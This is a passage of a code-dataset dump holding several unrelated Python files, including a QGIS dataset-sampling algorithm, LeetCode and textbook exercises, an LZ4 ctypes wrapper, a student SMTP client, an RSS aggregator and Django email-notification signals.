Group.DatasetCreation.value\r\n\r\n def initAlgorithm(self, configuration: Dict[str, Any] = None):\r\n self.addParameterClassificationDataset(self.P_DATASET, self._DATASET)\r\n self.addParameterString(self.P_N, self._N)\r\n self.addParameterBoolean(self.P_REPLACE, self._REPLACE, False, advanced=True)\r\n self.addParameterBoolean(self.P_PROPORTIONAL, self._PROPORTIONAL, False, advanced=True)\r\n self.addParameterInt(self.P_SEED, self._SEED, None, True, 1, advanced=True)\r\n self.addParameterFileDestination(self.P_OUTPUT_DATASET, self._OUTPUT_DATASET, self.PickleFileFilter)\r\n self.addParameterFileDestination(\r\n self.P_OUTPUT_COMPLEMENT, self._OUTPUT_COMPLEMENT, self.PickleFileFilter, None, True, False\r\n )\r\n\r\n def processAlgorithm(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext, feedback: QgsProcessingFeedback\r\n ) -> Dict[str, Any]:\r\n filenameSample = self.parameterAsFile(parameters, self.P_DATASET, context)\r\n N = self.parameterAsValues(parameters, self.P_N, context)\r\n replace = self.parameterAsBoolean(parameters, self.P_REPLACE, context)\r\n proportional = self.parameterAsBoolean(parameters, self.P_PROPORTIONAL, context)\r\n seed = self.parameterAsInt(parameters, self.P_SEED, context)\r\n filename = self.parameterAsFileOutput(parameters, self.P_OUTPUT_DATASET, context)\r\n filename2 = self.parameterAsFileOutput(parameters, self.P_OUTPUT_COMPLEMENT, context)\r\n\r\n with open(filename + '.log', 'w') as logfile:\r\n feedback, feedback2 = self.createLoggingFeedback(feedback, logfile)\r\n self.tic(feedback, parameters, context)\r\n\r\n dump = ClassifierDump(**Utils.pickleLoad(filenameSample))\r\n feedback.pushInfo(\r\n f'Load dataset: X=array{list(np.shape(dump.X))} y=array{list(np.shape(dump.y))} categories={[c.name for c in dump.categories]}')\r\n\r\n # draw samples\r\n if seed is not None:\r\n np.random.seed(seed)\r\n\r\n indices, indices2 = self.drawSamples(N, dump, proportional, replace, feedback)\r\n\r\n # store sample\r\n dump2 = ClassifierDump(dump.categories, dump.features, dump.X[indices], 
dump.y[indices], None)\r\n Utils.pickleDump(dump2.__dict__, filename)\r\n\r\n # store conmplement\r\n if filename2 is not None:\r\n dump2 = ClassifierDump(dump.categories, dump.features, dump.X[indices2], dump.y[indices2], None)\r\n Utils.pickleDump(dump2.__dict__, filename2)\r\n\r\n result = {self.P_OUTPUT_DATASET: filename, self.P_OUTPUT_COMPLEMENT: filename2}\r\n self.toc(feedback, result)\r\n\r\n return result\r\n\r\n @classmethod\r\n def drawSamples(cls, N: List[Union[int, float]], dump: ClassifierDump, proportional: bool, replace: bool, feedback):\r\n indices = list()\r\n if len(N) == 1:\r\n N = N * len(dump.categories)\r\n if len(N) != len(dump.categories):\r\n raise QgsProcessingException(\r\n f'Number of sample sizes ({len(N)}) not matching number of categories ({len(dump.categories)}).')\r\n for c, Ni in zip(dump.categories, N):\r\n valid = np.where(dump.y == c.value)[0]\r\n n = len(valid)\r\n if proportional:\r\n Ni = int(round(n * Ni / 100)) # derive absolute Ni\r\n if not replace:\r\n Ni = min(n, Ni)\r\n feedback.pushInfo(f'Draw {Ni} of {n} samples [{c.name}]')\r\n if Ni == 0:\r\n continue\r\n drawn = np.random.choice(valid, Ni, replace=replace)\r\n indices.extend(drawn.tolist())\r\n\r\n indices2 = np.full((dump.X.shape[0],), True, bool)\r\n indices2[indices] = False\r\n indices2 = np.where(indices2)[0].tolist()\r\n\r\n return indices, indices2\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapboxprocessing/algorithm/randomsamplesfromclassificationdatasetalgorithm.py","file_name":"randomsamplesfromclassificationdatasetalgorithm.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"3108207517","text":"# Return any binary tree that matches the given preorder and postorder traversal\n# s. \n# \n# Values in the traversals pre and post are distinct positive integers. \n# \n# \n# \n# \n# Example 1: \n# \n# \n# Input: pre = [1,2,4,5,3,6,7], post = [4,5,2,6,7,3,1]\n# Output: [1,2,3,4,5,6,7]\n# \n# \n# \n# \n# Note: \n# \n# \n# 1 <= pre.length == post.length <= 30 \n# pre[] and post[] are both permutations of 1, 2, ..., pre.length. \n# It is guaranteed an answer exists. If there exists multiple answers, you can \n# return any of them. 
\n# \n# \n# Related Topics Tree\n\n\nclass TreeNode(object):\n def __init__(self, v):\n self.val = v\n\n\ndef toTree(arr, s):\n n = len(arr)\n if s < n:\n if arr[s]:\n l = 2 * s + 1\n r = 2 * s + 2\n return TreeNode(arr[s],\n toTree(arr, l) if l < n else None,\n toTree(arr, r) if r < n else None)\n else:\n return None\n\n\nfrom random import random\nfrom graphviz import Digraph\n\n\ndef gen_tree(cur_val, new_node_prob=1.0):\n f = 0.7\n if random() < new_node_prob:\n left_node, next_val = gen_tree(cur_val + 1, new_node_prob * f)\n right_node, next_val = gen_tree(next_val, new_node_prob * f)\n tr = TreeNode(cur_val)\n tr.left = left_node\n tr.right = right_node\n return tr, next_val\n else:\n return None, cur_val\n\n\ndef render_helper(node, g):\n if node:\n g.node(str(node.val))\n if node.left:\n render_helper(node.left, g)\n g.edge(str(node.val), str(node.left.val))\n if node.right:\n render_helper(node.right, g)\n g.edge(str(node.val), str(node.right.val))\n\n\ndef render(tree, name):\n g = Digraph(comment=name)\n render_helper(tree, g)\n g.render(name, '/home/sunilsn/leetcode/graphs')\n\n\ndef preorder(tree):\n return [tree.val] + preorder(tree.left) + preorder(tree.right) if tree else []\n\n\ndef postorder(tree):\n return postorder(tree.left) + postorder(tree.right) + [tree.val] if tree else []\n\n\nnull = None\n\n\ndef test():\n for n in range(10):\n cur_tree, _ = gen_tree(1)\n pre_tree = preorder(cur_tree)\n post_tree = postorder(cur_tree)\n print(pre_tree, post_tree)\n render(cur_tree, 'tree_%d' % n)\n s = Solution()\n reconstructed_tree = s.constructFromPrePost(pre_tree, post_tree)\n assert preorder(reconstructed_tree) == pre_tree\n assert postorder(reconstructed_tree) == post_tree\n\n\nfrom typing import List\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\ndef prepost(pre, post, post_index, s_pre, e_pre, s_post, e_post):\n if s_pre < e_pre:\n node = TreeNode(pre[s_pre])\n ls_pre = s_pre + 1\n le_post = post_index[pre[ls_pre]] + 1 if ls_pre < e_pre else e_post - 1\n le_pre = ls_pre + (le_post - s_post)\n ls_post = s_post\n node.left = prepost(pre, post, post_index, ls_pre, le_pre, ls_post, le_post)\n rs_pre = le_pre\n re_pre = e_pre\n rs_post = le_post\n re_post = e_post - 1\n node.right = prepost(pre, post, post_index, rs_pre, re_pre, rs_post, re_post)\n return node\n else:\n return None\n\n\nclass Solution:\n def constructFromPrePost(self, pre: List[int], post: List[int]) -> TreeNode:\n post_index = {x: i for i, x in enumerate(post)}\n n = len(pre)\n return prepost(pre, post, post_index, 0, n, 0, n)\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"sunilnandihalli/leetcode","sub_path":"editor/en/[889]Construct Binary Tree from Preorder and Postorder Traversal.py","file_name":"[889]Construct Binary Tree from Preorder and Postorder Traversal.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1219354075","text":"# 7-4\nprompt = \"\\nWhat toppings you want in your pizza? \"\nprompt += \"\\n(Enter 'quit' when you are finished.) 
\"\n\nactive = True\nwhile active:\n message = input(prompt)\n\n if message == 'quit':\n active = False\n else:\n print(f\" I'll add {message}\")\n","repo_name":"RunnerOnFoot/PCC","sub_path":"Chapter_7/Exercises/pizza_toppings_while_loop_flag.py","file_name":"pizza_toppings_while_loop_flag.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43757687994","text":"from unittest import TestCase\n\nfrom allocator import PukelsheimLowerApportionment, PukelsheimUpperApportionment\nfrom prepocessor import (\n MetadataParser,\n VotesParser,\n CantonSeatsParser,\n)\n\n\nclass TestPukelsheimLowerApportionment(TestCase):\n @staticmethod\n def _get_test_data():\n districts = {\n \"WK1\": 6,\n \"WK2\": 5,\n \"WK3\": 4,\n }\n parties = {\n \"A\": 6,\n \"B\": 5,\n \"C\": 4,\n }\n party_votes = {\n \"A\": {\"WK1\": 14400, \"WK2\": 10100, \"WK3\": 6400},\n \"B\": {\"WK1\": 12000, \"WK2\": 10000, \"WK3\": 6000},\n \"C\": {\"WK1\": 4500, \"WK2\": 9900, \"WK3\": 5000},\n }\n\n return districts, parties, party_votes\n\n def test_complete_run(self):\n pk = PukelsheimLowerApportionment(\n *TestPukelsheimLowerApportionment._get_test_data()\n )\n pk.init_district_div()\n\n # lower apportionment\n pk.calc_all_district_seats()\n pk.allocate_district_seats()\n\n # upper apportionment\n pk.allocate_party_seats()\n\n # check district seats\n self.assertEqual(6, pk._sum_of_district_seats(\"WK1\"))\n self.assertEqual(5, pk._sum_of_district_seats(\"WK2\"))\n self.assertEqual(4, pk._sum_of_district_seats(\"WK3\"))\n\n # check party seats\n self.assertEqual(6, pk._sum_of_party_seats(\"A\"))\n self.assertEqual(5, pk._sum_of_party_seats(\"B\"))\n self.assertEqual(4, pk._sum_of_party_seats(\"C\"))\n\n def test_check_allocated_seats(self):\n pk = PukelsheimLowerApportionment(\n *TestPukelsheimLowerApportionment._get_test_data()\n )\n self.assertFalse(pk.check_allocated_seats())\n pk.run()\n self.assertTrue(pk.check_allocated_seats())\n\n\nclass TestPukelsheimUpperApportionment(TestCase):\n def test_run_test_data(self):\n party_votes = {\n \"A\": {\"WK1\": 14400, \"WK2\": 10100, \"WK3\": 6400},\n \"B\": {\"WK1\": 12000, \"WK2\": 10000, \"WK3\": 6000},\n \"C\": {\"WK1\": 4500, \"WK2\": 9900, \"WK3\": 5000},\n }\n\n districts = {\n \"WK1\": 6,\n \"WK2\": 5,\n \"WK3\": 4,\n }\n\n pk = PukelsheimUpperApportionment(party_votes, districts)\n res = pk.run()\n self.assertEqual(6, res.loc[\"seats\", \"A\"])\n self.assertEqual(5, res.loc[\"seats\", \"B\"])\n self.assertEqual(4, res.loc[\"seats\", \"C\"])\n\n def test_run_real_data(self):\n meta = MetadataParser()\n meta.read()\n canton_seats_parser = CantonSeatsParser(\n meta.cantons_name_dict, meta.cantons\n )\n canton_seats_df = canton_seats_parser.read()\n canton_seats_df.drop(\"Total\", axis=1, inplace=True)\n\n vote = VotesParser(meta.cantons_dict, meta.parties_dict)\n votes_cantonal = vote.read_canton_level(\n meta.get_empty_canton_party_data_frame()\n )\n votes_cantonal.drop(\"2nd round\", axis=1, inplace=True)\n votes_cantonal.drop(\"Others\", axis=1, inplace=True)\n pku = PukelsheimUpperApportionment(votes_cantonal, canton_seats_df)\n upper_apportionment = pku.run()\n self.assertEqual(200, 
upper_apportionment.loc[\"seats\"].sum())\n","repo_name":"tcinbis/biprop-election-report","sub_path":"tests/test_allocator.py","file_name":"test_allocator.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45561257496","text":"import ctypes\nfrom ctypes import *\n\nfrom pathlib import Path\nfrom typing import Tuple\n\n\nclass Mem:\n K1 = 1024\n K2 = 2 * K1\n K4 = 4 * K1\n K8 = 8 * K1\n K16 = 16 * K1\n K32 = 32 * K1\n K64 = 64 * K1\n K128 = 128 * K1\n K256 = 256 * K1\n K512 = 512 * K1\n M1 = 1024 * K1\n M4 = 4 * M1\n\n @staticmethod\n def round_up(value: int, step: int):\n return (value + step - 1) // step * step\n\n\ndef _offset_pointer(pointer, pointer_class, offset):\n return pointer_class(ctypes.addressof(pointer) + offset)\n\n\ndef load_library(path: Path):\n return cdll.LoadLibrary(str(path))\n\n\nclass LZ4Wrapper:\n lib_cdll: ctypes.CDLL = load_library(Path(__file__).parent / 'msys-lz4-1.dll')\n\n @classmethod\n def reload_library(cls, path: Path):\n cls.lib_cdll = cdll.LoadLibrary(str(path))\n\n # LZ4LIB_API int LZ4_compressBound(int inputSize);\n _lz4_compress_bound = lib_cdll.LZ4_compressBound\n _lz4_compress_bound.argtypes = [c_int32]\n _lz4_compress_bound.restype = c_int32\n\n def compress_bound(self, size):\n return self._lz4_compress_bound(size)\n\n # LZ4LIB_API int LZ4_decompress_safe (const char* src, char* dst, int compressedSize, int dstCapacity);\n _lz4_decompress_safe = lib_cdll.LZ4_decompress_safe\n _lz4_decompress_safe.argtypes = [c_char_p, c_char_p, c_int32, c_int32]\n _lz4_decompress_safe.restype = c_int32\n\n def decompress_safe(self, compressed_data: bytes, decompressed_size: int):\n compressed_buffer = create_string_buffer(compressed_data)\n decompressed_buffer = create_string_buffer(decompressed_size)\n rv = self._lz4_decompress_safe(compressed_buffer, decompressed_buffer, len(compressed_data), decompressed_size)\n assert rv > 1, f'Received error code from LZ4:{rv}'\n assert rv == decompressed_size\n decompressed_data = bytes(decompressed_buffer.raw[:rv])\n del compressed_buffer\n del decompressed_buffer\n return decompressed_data\n\n # LZ4LIB_API int LZ4_compress_fast (const char* src, char* dst, int srcSize, int dstCapacity, int acceleration);\n _lz4_compress_fast = lib_cdll.LZ4_compress_fast\n _lz4_compress_fast.argtypes = [c_char_p, c_char_p, c_int32, c_int32, c_int32]\n _lz4_compress_fast.restype = c_int32\n\n def compress_fast(self, data: bytes, acceleration=1):\n assert acceleration < 65537, f'{acceleration} is higher than LZ4_ACCELERATION_MAX(65537)'\n data_buffer = create_string_buffer(data)\n minimum_buffer_size = self.compress_bound(len(data))\n compressed_buffer = create_string_buffer(minimum_buffer_size)\n rv = self._lz4_compress_fast(data_buffer, compressed_buffer, len(data), minimum_buffer_size, acceleration)\n assert rv > 1, f'Received error code from LZ4:{rv}'\n compressed_data = bytes(compressed_buffer.raw[:rv])\n del data_buffer\n del compressed_buffer\n return compressed_data\n\n\nclass LZ4StreamWrapper(LZ4Wrapper):\n class LZ4_streamDecode_t(ctypes.Structure):\n pass\n\n LZ4_streamDecode_t._fields_ = [\n ('externalDict', c_char_p),\n ('extDictSize', c_uint32),\n ('prefixEnd', c_char_p),\n ('prefixSize', c_uint32),\n ]\n\n lib_cdll = LZ4Wrapper.lib_cdll\n\n def __init__(self):\n self._stream_state = self._lz4_create_steam_decode()\n pass\n\n def __del__(self):\n rv = self._lz4_free_steam_decode(self._stream_state)\n assert rv == 0, 
f'Received error code from LZ4:{rv}'\n\n # LZ4LIB_API LZ4_streamDecode_t* LZ4_createStreamDecode(void);\n _lz4_create_steam_decode = lib_cdll.LZ4_createStreamDecode\n _lz4_create_steam_decode.argtypes = []\n _lz4_create_steam_decode.restype = POINTER(LZ4_streamDecode_t)\n\n # LZ4LIB_API int LZ4_freeStreamDecode (LZ4_streamDecode_t* LZ4_stream);\n _lz4_free_steam_decode = lib_cdll.LZ4_freeStreamDecode\n _lz4_free_steam_decode.argtypes = [POINTER(LZ4_streamDecode_t)]\n _lz4_free_steam_decode.restype = c_int32\n\n\nclass LZ4ChainDecoder(LZ4StreamWrapper):\n lib_cdll = LZ4Wrapper.lib_cdll\n\n def __init__(self, block_size, extra_blocks=0):\n super().__init__()\n self._block_size = Mem.round_up(max(block_size, Mem.K1), Mem.K1)\n self._extra_blocks = max(extra_blocks, 0)\n self._output_length = Mem.K64 + (1 + extra_blocks) * self._block_size + 32\n self._output_index = 0\n self._output_buffer = create_string_buffer(self._output_length + 8)\n\n def decode(self, source: c_char_p, source_size, block_size: int) -> int:\n if block_size <= 0:\n block_size = self._block_size\n self.prepare(block_size)\n tmp = _offset_pointer(self._output_buffer, c_char_p, self._output_index)\n decoded_size = self.decode_block(source, source_size, tmp, block_size)\n assert decoded_size > 0, f'Received error code from LZ4:{decoded_size}'\n self._output_index += decoded_size\n return decoded_size\n\n def prepare(self, block_size: int) -> None:\n if self._output_index + block_size <= self._output_length:\n return\n self._output_index = self.copy_dict(self._output_index)\n\n def copy_dict(self, index):\n dict_start = max(index - Mem.K64, 0)\n dict_size = index - dict_start\n self._output_buffer.raw[:] = self._output_buffer[dict_size:]\n self._stream_state.prefixSize = dict_size\n self._stream_state.prefixEnd = _offset_pointer(self._output_buffer, c_char_p, dict_size)\n self._stream_state.externalDict = 0\n self._stream_state.extDictSize = 0\n return dict_size\n\n # LZ4LIB_API int LZ4_decompress_safe_continue (LZ4_streamDecode_t* LZ4_streamDecode, const char* src, char* dst, int srcSize, int dstCapacity);\n _lz4_decompress_safe_continue = lib_cdll.LZ4_decompress_safe_continue\n _lz4_decompress_safe_continue.argtypes = [POINTER(LZ4StreamWrapper.LZ4_streamDecode_t), c_char_p, c_char_p, c_int32,\n c_int32]\n _lz4_decompress_safe_continue.restype = c_int32\n\n def decode_block(self, data, data_size: int, target, target_size):\n rv = self._lz4_decompress_safe_continue(self._stream_state, data, target, data_size, target_size)\n del data\n return rv\n\n def drain(self, target: c_char_p, offset: int, size: int) -> None:\n offset = self._output_index + offset\n if offset < 0 or size < 0 or offset + size > self._output_index:\n raise AssertionError('Invalid operation')\n\n memmove(target, _offset_pointer(self._output_buffer, c_char_p, offset), size)\n\n def decode_and_drain(self, source, source_size, target, target_size) -> Tuple[bool, int]:\n decoded = 0\n if source_size <= 0:\n return False, decoded\n decoded = self.decode(source, source_size, target_size)\n if decoded <= 0 or target_size < decoded:\n return False, decoded\n self.drain(target, -decoded, decoded)\n return True, decoded\n\n def decompress(self, compressed_data, decompressed_size):\n data = create_string_buffer(compressed_data)\n output = create_string_buffer(decompressed_size)\n self.decode_and_drain(data, len(compressed_data), output, decompressed_size)\n return bytes(output.raw)\n\n\nif __name__ == '__main__':\n a = LZ4ChainDecoder(1)\n d = 
b'b\\x01\\x00\\x00\\x00\\x13\\x00\\x01\\x00\\xe00H\\x0ef\\x06\\x00\\x00\\x00\\x01\\xfd=\\xdc\\x0b\\x1e\\x11\\x00p\\x00\\xc6V\\xa5#\\x1a\\x00\\x14\\x00\\x02#\\x00fHw\\x17\\x12\\x1a\\x00\\x01\\x00B\\x12\\xda\\xd3v*\\x00B\\x80i;\\x1c\\n\\x00SkXW\\xe5\\x01 \\x00B\\xb7\\xb0h=\\x0c\\x00b\\x80\\xbf\\x19\\xbf[5\"\\x00@\\xf0i\\xb6\\xfc\\n\\x00r1\\x00\\xb2\\x01\\x0cx\\t+\\x00`\\xff#\\x99\\x00\\xcd\\x06\\n\\x00@b\\x1c\\x1b\\xc6\\x1f\\x00\\xf1\\x00worldspawn\\x00\\x16\\x02 \\xe4<\\x00!.0\\x01\\x00\\x1d \\t\\x00_\\x00\\xcf\\xda\\x98\\xba#\\x00\\x0cA,\\xe4\\xc1\\x19x\\x00\\x04\\x1a\\x00\\r\\t\\x00R\\x008\\xa0c\\xa9\\x9b\\x00@\\x86\\x81\\x8b\\x9c\\n\\x00\\xe0construct\\x00\\xb3b\\xf2\\xd3\\x12\\x00\\xd0sky_day01_01\\x00'\n b = create_string_buffer(321)\n cd = a.decode_block(d, len(d), b, 321)\n print(cd)\n","repo_name":"stepa2/SourceIO","sub_path":"utilities/lz4_wrapper/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"4563042822","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields\n\n\nclass irUiView(models.Model):\n\n _inherit = 'ir.ui.view'\n\n view_theme_id = fields.Many2one('ir.ui.view.theme', string=\"Theme\")\n company_ids = fields.Many2many('res.company', 'res_company_ir_ui_view_rel', 'user_id', 'view_id', string='Companies')\n","repo_name":"njeudy/qweb-report-addons","sub_path":"report_ng/models/ir_ui_view.py","file_name":"ir_ui_view.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35634635728","text":"#Student 1 Name: Paul Grad\n#Student 1 ID: 94574913\n#Student 2 Name: Mayan Shoshani\n#Student 2 ID: 15019784\nfrom socket import *\nmsg = \"\\r\\n I love computer networks!\"\nendmsg = \"\\r\\n.\\r\\n\"\n# Connect to the local host (an EECS server, where this code should be executed)\nmailserver = \"localhost\"\n# Create socket called clientSocket and establish a TCP connection with mailserver\n#Fill in start\nclientSocket = socket(AF_INET, SOCK_STREAM)\nserverPort =25\nclientSocket.connect((mailserver,serverPort))\n\n#Fill in end\nrecv = clientSocket.recv(1024).decode()\nprint(recv)\nif recv[:3] != '220':\n print('220 reply not received from server.')\n# Send HELO command and print server response.\nheloCommand = 'HELO Alice\\r\\n'\nclientSocket.send(heloCommand.encode())\nrecv1 = clientSocket.recv(1024).decode()\nprint(recv1)\nif recv1[:3] != '250':\n print('250 reply not received from server.')\n# Send MAIL FROM command and print server response.\n# Fill in start\nheloCommand = 'MAIL FROM: \\r\\n'\nclientSocket.send(heloCommand.encode())\nrecv1 = clientSocket.recv(1024).decode()\nprint(recv1)\nif recv1[:3] != '250':\n print('250 reply not received from server.')\n# Fill in end\n# Send RCPT TO command and print server response.\n# Fill in start\nheloCommand = 'RCPT TO: \\r\\n'\nclientSocket.send(heloCommand.encode())\nrecv1 = clientSocket.recv(1024).decode()\nprint(recv1)\nif recv1[:3] != '250':\n print('250 reply not received from server.')\n# Fill in end\n# Send DATA command and print server response.\n# Fill in start\nheloCommand = 'DATA\\r\\n'\nclientSocket.send(heloCommand.encode())\nrecv1 = clientSocket.recv(1024).decode()\nprint(recv1)\nif recv1[:3] != '354':\n print('250 reply not received from server.')\n# Fill in end\n# Send message data.\n# Fill in start\nheloCommand = 'hi\\r\\n'\nclientSocket.send(heloCommand.encode())\n# Fill in 
end\n# Message ends with a single period.\n# Fill in start\nheloCommand = '.\\r\\n'\nclientSocket.send(heloCommand.encode())\nrecv1 = clientSocket.recv(1024).decode()\nprint(recv1)\nif recv1[:3] != '250':\n print('250 reply not received from server.')\n# Fill in end\n# Send QUIT command and get server response.\n# Fill in start\nheloCommand = 'QUIT\\r\\n'\nclientSocket.send(heloCommand.encode())\nrecv1 = clientSocket.recv(1024).decode()\nprint(recv1)\nif recv1[:3] != '221':\n print('250 reply not received from server.')\n# Fill in end\n","repo_name":"shoshanimayan/network2","sub_path":"hw2/smtp_client.py","file_name":"smtp_client.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15533102321","text":"command = input()\ndict_results = {}\ndict_language = {}\nwhile command != \"exam finished\":\n result = command.split(\"-\")\n if result[1] != \"banned\":\n name, language, mark = result[0], result[1], int(result[2])\n\n if language not in dict_language:\n dict_language[language] = 1\n else:\n dict_language[language] += 1\n\n if name not in dict_results:\n dict_results[name] = mark\n elif dict_results[name] < mark:\n dict_results[name] = mark\n\n else: # banned\n banned_user = result[0]\n del dict_results[banned_user]\n command = input()\n\n# print(dict_results)\n# print(dict_language)\n\nsorted_dict_results = dict(sorted(dict_results.items(), key=lambda x: (-x[1], x[0]))) # by HIGHEST mark, then by name\nsorted_dict_language = dict(sorted(dict_language.items(), key=lambda x: (-x[1], x[0]))) # by MOST participants, then by lang. name\n# print(sorted_dict_results)\nprint(\"Results:\")\nfor k, v in sorted_dict_results.items():\n print(f\"{k} | {v}\")\n\nprint(\"Submissions:\")\nfor k, v in sorted_dict_language.items():\n print(f\"{k} - {v}\")\n","repo_name":"karalkal/SoftUni_Python_Fundamentals","sub_path":"07_Dictionaries/2_exercises/ex11_softuni_exam_results.py","file_name":"ex11_softuni_exam_results.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"790438867","text":"#!/usr/bin/env python\n\"\"\"\nch05_plucker_aggregator.py\n\nPoll subscriptions, produce HTML summaries, wrap up as a plucker document.\n\"\"\"\n\nimport sys, time\nfrom agglib import *\nimport PyPlucker.Spider\n\nHTML_FN = \"plucker-aggregator-%s.html\" % time.strftime(\"%Y%m%d-%H%M%S\")\nFEEDS_FN = \"plucker_feeds.txt\"\nFEED_DB_FN = \"plucker_feeds_db\"\nENTRY_DB_FN = \"plucker_entry_seen_db\"\n\nPLUCKER_DIR = \".\"\nPLUCKER_TITLE = \"%s News\" % time.strftime(\"%Y%m%d-%H%M%S\")\nPLUCKER_FN = \"plucker-%s\" % time.strftime(\"%Y%m%d-%H%M%S\")\nPLUCKER_BPP = \"0\"\nPLUCKER_DEPTH = \"1\"\n\ndef main(): \n \"\"\"\n Poll subscribed feeds and produce aggregator page.\n \"\"\"\n feed_db, entry_db = openDBs(FEED_DB_FN, ENTRY_DB_FN)\n\n feeds = [ x.strip() for x in open(FEEDS_FN, \"r\").readlines() ]\n \n entries = getNewFeedEntries(feeds, feed_db, entry_db)\n \n if len(entries) > 0:\n out_fn = HTML_FN\n writeAggregatorPage(entries, out_fn, DATE_HDR_TMPL, FEED_HDR_TMPL, \n ENTRY_TMPL, PAGE_TMPL)\n buildPluckerDocument(PLUCKER_DIR, PLUCKER_FN, PLUCKER_TITLE, \n PLUCKER_DEPTH, PLUCKER_BPP, HTML_FN)\n \n closeDBs(feed_db, entry_db)\n\ndef buildPluckerDocument(pdir, pfn, ptitle, pdepth, pbpp, html_fn):\n \"\"\"\n Given some Plucker settings and an HTML file, attempt to build a \n Plucker document.\n \"\"\"\n 
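# hand the collected settings to the PyPlucker spider as argv-style options\n    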
PyPlucker.Spider.realmain(None, argv=[\n sys.argv[0],\n '-P', pdir,\n '-f', pfn,\n '-H', html_fn,\n '-N', ptitle,\n '-M', pdepth,\n '--bpp', pbpp,\n '--title=%s' % ptitle,\n ])\n\n# Presentation templates for output follow:\n\nDATE_HDR_TMPL = \"\"\"\n

    <h1 class=\"dateheader\">%s</h1>\n\"\"\"\n\nFEED_HDR_TMPL = \"\"\"\n    <h2 class=\"feedheader\">%(feed.title)s</h2>\n\"\"\"\n\nENTRY_TMPL = \"\"\"\n    <div class=\"entry\">\n        <div class=\"entryheader\">\n            <span class=\"entrytime\">%(time)s</span>: \n            <span class=\"entrytitle\">%(entry.title)s</span>\n        </div>\n        <div class=\"entrysummary\">\n            %(entry.summary)s\n        </div>\n        %(content)s\n    </div>\n\"\"\"\n\nPAGE_TMPL = \"\"\"\n<html>\n    <head>\n        <title>Feed aggregator #1</title>\n    </head>\n    <body>\n        %s\n    </body>\n</html>\n\"\"\"\n\nif __name__ == \"__main__\": main()\n","repo_name":"lmorchard/hacking_rss_and_atom","sub_path":"ch05_plucker_aggregator.py","file_name":"ch05_plucker_aggregator.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"}
\\n\\n'\n 'Good day :).')\n from_email = 'adiphoko@bhp.org.bw'\n send_email_notification(\n instance, subject=subject, message=message, from_email=from_email,\n to_emails=[instance.request_to.email, ], status=instance.status)\n\n elif instance.status in ['approved', 'rejected']:\n message = (f'Dear {request_approval.request_by} \\n\\n Please be informed '\n f'Document no. {request_approval.document_id} has been {instance.status}.'\n f'Visit http://{current_site.domain} for further details.')\n from_email = 'adiphoko@bhp.org.bw'\n user = check_user(request_approval.request_by)\n send_email_notification(\n instance, subject=subject, message=message, from_email=from_email,\n to_emails=[user.email, ], status=instance.status)\n\n elif instance.status == 'pending':\n message = (f'Dear {instance.request_to.get_full_name()} \\n\\n Please note'\n f' {request_approval.request_by} is re-requesting your'\n f' approval for {request_approval.document_id}'\n f' on the BHP Utility system http://{current_site.domain}. \\n\\n'\n 'Good day :).')\n from_email = 'adiphoko@bhp.org.bw'\n send_email_notification(\n instance, subject=subject, message=message, from_email=from_email,\n to_emails=[instance.request_to.email, ], status=instance.status)\n\n\ndef send_email_notification(\n instance, subject=None, message=None, from_email=None, to_emails=[], status=None):\n try:\n send_mail(subject, message, from_email, to_emails, fail_silently=False)\n except SMTPException as e:\n raise ValidationError(f'There was an error sending an email: {e}')\n else:\n# Notifications.objects.create(\n# email=instance.request_to.email, success_status=True)\n if status:\n if status == 'new':\n instance.status = 'pending'\n if instance.request_reason in 'prf_approval':\n value = instance.request_to\n update_prf_field(\n prf_number=instance.request_approval.document_id, field_name='approval_by', value=value)\n elif instance.request_reason == 'confirm_funds':\n value = instance.request_to\n update_prf_field(\n prf_number=instance.request_approval.document_id, field_name='funds_confirmed', value=value)\n elif instance.request_reason == 'po_auth_one':\n value = instance.request_to\n update_obj_field(\n model_cls=PurchaseOrder, identifier_field='order_number',\n identifier_value=instance.request_approval.document_id, field_name='first_approver', value=value)\n elif instance.request_reason == 'po_auth_two':\n value = instance.request_to\n update_obj_field(\n model_cls=PurchaseOrder, identifier_field='order_number',\n identifier_value=instance.request_approval.document_id, field_name='second_approver', value=value)\n elif instance.request_reason == 'executive_approval':\n identifier = instance.request_approval.document_id\n value = instance.request_to\n if is_purchase_requisition(identifier):\n update_obj_field(\n model_cls=PurchaseRequisition, identifier_field='prf_number',\n identifier_value=identifier, field_name='approval_by', value=value)\n else:\n update_obj_field(\n model_cls=PurchaseOrder, identifier_field='order_number',\n identifier_value=identifier, field_name='first_approver', value=value)\n instance.save()\n else:\n instance.status = status\n if instance.status == 'approved':\n signature = user_signature(instance.request_to)\n instance.approval_sign = signature\n\n\ndef check_user(user):\n if not isinstance(user, ProxyUser):\n try:\n return ProxyUser.objects.get(id=user.id)\n except ProxyUser.DoesNotExist:\n raise ValidationError(f'User does not exist.')\n return user\n\n\ndef update_prf_field(prf_number=None, field_name=None, 
